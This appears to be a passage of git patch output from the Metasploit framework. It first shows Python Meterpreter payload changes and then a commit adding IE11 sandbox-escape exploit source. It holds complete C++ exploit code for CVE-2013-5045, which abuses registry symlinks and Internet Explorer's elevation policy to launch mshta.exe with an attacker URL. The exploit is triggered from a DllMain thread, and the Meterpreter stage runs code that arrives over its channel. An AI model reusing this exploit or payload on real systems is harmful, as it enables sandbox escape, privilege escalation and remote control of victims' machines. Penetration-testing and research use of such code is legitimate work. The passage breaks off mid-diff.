TLV_META_TYPE_BOOL: - val = bool(struct.unpack('b', val)[0]) - elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: - pass - return {'type':tlv[1], 'length':tlv[0], 'value':val} - offset += tlv[0] - return {} - @export def packet_enum_tlvs(pkt, tlv_type = None): offset = 0 @@ -155,7 +146,7 @@ def packet_enum_tlvs(pkt, tlv_type = None): if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type): val = pkt[offset+8:(offset+8+(tlv[0] - 8))] if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = val.split('\x00', 1)[0] + val = val.split(NULL_BYTE, 1)[0] elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: val = struct.unpack('>I', val)[0] elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: @@ -166,6 +157,14 @@ def packet_enum_tlvs(pkt, tlv_type = None): offset += tlv[0] raise StopIteration() +@export +def packet_get_tlv(pkt, tlv_type): + try: + tlv = list(packet_enum_tlvs(pkt, tlv_type))[0] + except IndexError: + return {} + return tlv + @export def tlv_pack(*args): if len(args) == 2: @@ -173,18 +172,22 @@ def tlv_pack(*args): else: tlv = args[0] data = "" - if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00' - elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: data = struct.pack('>III', 12, tlv['type'], tlv['value']) elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: - data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value']))) - elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] - elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] - elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8') + else: + value = tlv['value'] + if not is_bytes(value): + value = bytes(value, 'UTF-8') + if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE + elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value + elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value + elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value return data #@export @@ -254,7 +257,7 @@ class PythonMeterpreter(object): self.channels = {} self.interact_channels = [] self.processes = {} - for func in filter(lambda x: x.startswith('_core'), dir(self)): + for func in list(filter(lambda x: x.startswith('_core'), dir(self))): self.extension_functions[func[1:]] = getattr(self, func) self.running = True @@ -360,13 +363,13 @@ class PythonMeterpreter(object): data_tlv = packet_get_tlv(request, TLV_TYPE_DATA) if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: return ERROR_FAILURE - preloadlib_methods = self.extension_functions.keys() + preloadlib_methods = list(self.extension_functions.keys()) symbols_for_extensions = {'meterpreter':self} symbols_for_extensions.update(EXPORTED_SYMBOLS) i = code.InteractiveInterpreter(symbols_for_extensions) i.runcode(compile(data_tlv['value'], '', 'exec')) - postloadlib_methods = self.extension_functions.keys() - new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods) + postloadlib_methods = list(self.extension_functions.keys()) + new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods)) for method in new_methods: response += tlv_pack(TLV_TYPE_METHOD, method) return ERROR_SUCCESS, response @@ -484,17 +487,22 @@ class PythonMeterpreter(object): reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID) resp += tlv_pack(reqid_tlv) - handler_name = method_tlv['value'] + handler_name = str(method_tlv['value']) if handler_name in self.extension_functions: handler = self.extension_functions[handler_name] try: - #print("[*] running method {0}".format(handler_name)) + if DEBUGGING: + print("[*] running method {0}".format(handler_name)) result, resp = handler(request, resp) except Exception: - #print("[-] method {0} resulted in an error".format(handler_name)) + if DEBUGGING: + print("[-] method {0} resulted in an error".format(handler_name)) + exc_type, exc_value, exc_traceback = sys.exc_info() + traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stderr) result = ERROR_FAILURE else: - #print("[-] method {0} was requested but does not exist".format(handler_name)) + if DEBUGGING: + print("[-] method {0} was requested but does not exist".format(handler_name)) result = ERROR_FAILURE resp += tlv_pack(TLV_TYPE_RESULT, result) resp = struct.pack('>I', len(resp) + 4) + resp diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index 6c497f080c..cb5b286c0b 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -22,6 +22,9 @@ module Metasploit3 'License' => MSF_LICENSE, 'Session' => Msf::Sessions::Meterpreter_Python_Python )) + register_advanced_options([ + OptBool.new('DEBUGGING', [ true, "Enable debugging for the Python meterpreter", false ]) + ], self.class) end def generate_stage @@ -30,6 +33,11 @@ module Metasploit3 met = File.open(file, "rb") {|f| f.read(f.stat.size) } + + if datastore['DEBUGGING'] + met = met.sub("DEBUGGING = False", "DEBUGGING = True") + end + met end end From 75777cb3f900f9d4f673183275dbc2fad3ac886f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 29 May 2014 11:38:43 -0500 Subject: [PATCH 402/853] Add IE11SandboxEscapes source --- LICENSE | 4 + .../CVE-2013-5045/CVE-2013-5045.cpp | 184 +++++ .../CVE-2013-5045/CVE-2013-5045.vcxproj | 188 +++++ .../CVE-2013-5045/dllmain.cpp | 23 + .../CVE-2013-5045/stdafx.cpp | 8 + .../IE11SandboxEscapes/CVE-2013-5045/stdafx.h | 11 + .../CVE-2013-5045/targetver.h | 8 + .../CVE-2013-5046/CVE-2013-5046.cpp | 127 ++++ .../CVE-2013-5046/CVE-2013-5046.vcxproj | 182 +++++ .../CVE-2013-5046/dllmain.cpp | 23 + .../CVE-2013-5046/stdafx.cpp | 8 + .../IE11SandboxEscapes/CVE-2013-5046/stdafx.h | 12 + .../CVE-2013-5046/targetver.h | 8 + .../CVE-2014-0257/CVE-2014-0257.cpp | 201 ++++++ .../CVE-2014-0257/CVE-2014-0257.vcxproj | 182 +++++ .../CVE-2014-0257/dllmain.cpp | 23 + .../CVE-2014-0257/stdafx.cpp | 8 + .../IE11SandboxEscapes/CVE-2014-0257/stdafx.h | 11 + .../CVE-2014-0257/targetver.h | 8 + .../CVE-2014-0268/CVE-2014-0268.cpp | 81 +++ .../CVE-2014-0268/CVE-2014-0268.vcxproj | 183 +++++ .../CVE-2014-0268/dllmain.cpp | 23 + .../CVE-2014-0268/stdafx.cpp | 8 + .../IE11SandboxEscapes/CVE-2014-0268/stdafx.h | 11 + .../CVE-2014-0268/targetver.h | 8 + .../CommonUtils/CommonUtils.vcxproj | 154 ++++ .../IE11SandboxEscapes/CommonUtils/Utils.cpp | 373 ++++++++++ .../IE11SandboxEscapes/CommonUtils/Utils.h | 21 + .../CommonUtils/interfaces.h | 258 +++++++ .../IE11SandboxEscapes/CommonUtils/regln.cpp | 161 +++++ .../IE11SandboxEscapes/CommonUtils/regln.h | 70 ++ .../IE11SandboxEscapes/CommonUtils/stdafx.cpp | 8 + .../IE11SandboxEscapes/CommonUtils/stdafx.h | 15 + .../CommonUtils/targetver.h | 8 + .../IE11SandboxEscapes/IE11SandboxEscapes.sln | 72 ++ .../InjectDll/InjectDll.cpp | 107 +++ .../InjectDll/InjectDll.vcxproj | 155 ++++ .../IE11SandboxEscapes/InjectDll/stdafx.cpp | 8 + .../IE11SandboxEscapes/InjectDll/stdafx.h | 12 + .../IE11SandboxEscapes/InjectDll/targetver.h | 8 + .../exploits/IE11SandboxEscapes/LICENSE | 674 ++++++++++++++++++ .../exploits/IE11SandboxEscapes/README.md | 10 + 42 files changed, 3647 insertions(+) create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln create mode 100755 external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj create mode 100755 external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp create mode 100755 external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h create mode 100755 external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h create mode 100755 external/source/exploits/IE11SandboxEscapes/LICENSE create mode 100755 external/source/exploits/IE11SandboxEscapes/README.md diff --git a/LICENSE b/LICENSE index ea38924130..e16ad8f0a2 100644 --- a/LICENSE +++ b/LICENSE @@ -36,6 +36,10 @@ Files: external/ruby-lorcon/* Copyright: 2005, dragorn and Joshua Wright License: LGPL-2.1 +Files: external/source/exploits/IE11SandboxEscapes/* +Copyright: James Forshaw, 2014 +License: GPLv3 + Files: external/source/byakugan/* Copyright: Lurene Grenier, 2009 License: BSD-3-clause diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp new file mode 100755 index 0000000000..52d366faf8 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp @@ -0,0 +1,184 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" +#include <winternl.h> +#include <IEPMapi.h> + +#define MAX_ENV 32767 + +#pragma comment(lib, "Iepmapi.lib") + +typedef NTSTATUS (__stdcall *fNtOpenSection)( + _Out_ PHANDLE SectionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes + ); + +HANDLE MyCreateProcess(bstr_t exec, bstr_t cmdline) +{ + STARTUPINFO startInfo = { 0 }; + PROCESS_INFORMATION procInfo = { 0 }; + + if (!CreateProcess(exec, cmdline, NULL, NULL, FALSE, 0, NULL, NULL, + &startInfo, &procInfo)) + { + DebugPrintf("Error Creating Process: %d", GetLastError()); + + return nullptr; + } + else + { + CloseHandle(procInfo.hThread); + + return procInfo.hProcess; + } +} + +bstr_t GetExploitUrl(LPWSTR env) +{ + WCHAR buf[MAX_ENV]; + + GetEnvironmentVariable(env, buf, MAX_ENV); + + return buf; +} + +void CreateIEProcess() +{ + HANDLE hProcess = MyCreateProcess(GetExecutableFileName(nullptr), L"iexplore.exe " + GetExploitUrl(L"HTML_URL")); + + if (hProcess) + { + WaitForSingleObject(hProcess, 1000); + CloseHandle(hProcess); + } +} + +void CreateUserKey(LPCWSTR path) +{ + STARTUPINFO startInfo = { 0 }; + PROCESS_INFORMATION procInfo = { 0 }; + bstr_t sid = GetUserSid(); + + bstr_t linkName = L"\\Registry\\User\\" + sid + L"\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain"; + + LONG res = RegDeleteKey(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain"); + + DebugPrintf("Delete: %d", res); + + bstr_t destName = L"\\Registry\\User\\" + sid + path; + + CreateLink(linkName, destName, 0); + + CreateIEProcess(); + + DeleteLink(linkName); +} + +void DoRegistrySymlink() +{ + STARTUPINFO startInfo = { 0 }; + PROCESS_INFORMATION procInfo = { 0 }; + HKEY hKey = nullptr; + HANDLE hSection = nullptr; + bstr_t sid = GetUserSid(); + bool success = false; + + try + { + CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights"); + CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy"); + CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}"); + + LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}", + 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey); + + if (res != 0) + { + DebugPrintf("Open Class Key Failed %d", res); + throw 0; + } + + CreateRegistryValueString(hKey, L"AppName", L"mshta.exe"); + CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory()); + CreateRegistryValueDword(hKey, L"Policy", 3); + + bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_"; + + UNICODE_STRING objName = { 0 }; + objName.Buffer = name; + objName.Length = SysStringByteLen(name); + objName.MaximumLength = SysStringByteLen(name); + + OBJECT_ATTRIBUTES objAttr = { 0 }; + + InitializeObjectAttributes(&objAttr, &objName, OBJ_CASE_INSENSITIVE, 0, 0); + + fNtOpenSection pfNtOpenSection = (fNtOpenSection)GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenSection"); + + NTSTATUS status = pfNtOpenSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE, &objAttr); + + if (status != 0) + { + DebugPrintf("Error opening section: %08X\n", status); + throw 0; + } + + unsigned int* p = (unsigned int*)MapViewOfFile(hSection, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, sizeof(unsigned int)); + + if (p == nullptr) + { + DebugPrintf("Error mapping section %d\n", GetLastError()); + throw 0; + } + + DebugPrintf("Current Counter: %d\n", *p); + + // Increment + *p = *p + 1; + + DebugPrintf("New Counter: %d\n", *p); + + UnmapViewOfFile(p); + CloseHandle(hSection); + hSection = nullptr; + + MyCreateProcess(GetWindowsSystemDirectory() + L"\\mshta.exe", L"mshta.exe " + GetExploitUrl(L"HTA_URL")); + } + catch (...) + { + } + + if (hSection) + { + CloseHandle(hSection); + } + + if (hKey) + { + RegCloseKey(hKey); + } + +} + +DWORD CALLBACK ExploitThread(LPVOID hModule) +{ + CoInitialize(nullptr); + DoRegistrySymlink(); + CoUninitialize(); + + FreeLibraryAndExitThread((HMODULE)hModule, 0); +} \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj new file mode 100755 index 0000000000..285b19b27e --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj @@ -0,0 +1,188 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>CVE20140268</RootNamespace> + <ProjectName>CVE-2013-5045</ProjectName> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <ModuleDefinitionFile> + </ModuleDefinitionFile> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="CVE-2013-5045.cpp" /> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj"> + <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project> + </ProjectReference> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp new file mode 100755 index 0000000000..042cf2c7c4 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp @@ -0,0 +1,23 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "stdafx.h" + +DWORD CALLBACK ExploitThread(LPVOID hModule); + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp new file mode 100755 index 0000000000..11763c77a3 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// CVE-2014-0268.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h new file mode 100755 index 